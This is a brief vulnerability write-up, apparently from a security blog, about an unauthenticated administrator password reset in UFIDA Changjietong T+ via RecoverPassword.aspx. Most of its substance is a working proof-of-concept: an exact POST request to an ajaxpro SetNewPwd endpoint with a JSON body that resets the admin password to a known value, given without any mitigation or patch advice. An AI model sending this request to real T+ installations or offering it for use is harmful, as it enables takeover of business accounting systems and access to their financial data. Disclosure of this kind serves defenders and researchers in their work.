Ufida Changjietong T+ Recoverpassword Aspx Administrator Password Modification Vulnerability
Ufida Changjietong T+ Recoverpassword Aspx Administrator Password Modification Vulnerability
UFIDA Changjietong T+ RecoverPassword.aspx Administrator password modification vulnerability
Vulnerability Description
UFIDA Changjietong T+ RecoverPassword.aspx has an unauthorized administrator password modification vulnerability. Attackers can log in to the background through the vulnerability.
Vulnerability Impact
UFIDA Changjietong T+
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC, reset the account password to admin/123qwe
1
2
3
POST /tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd
{"pwdNew":"46f94c8de14fb36680850768ff1b7f2a"}
This post is licensed under CC BY 4.0 by the author.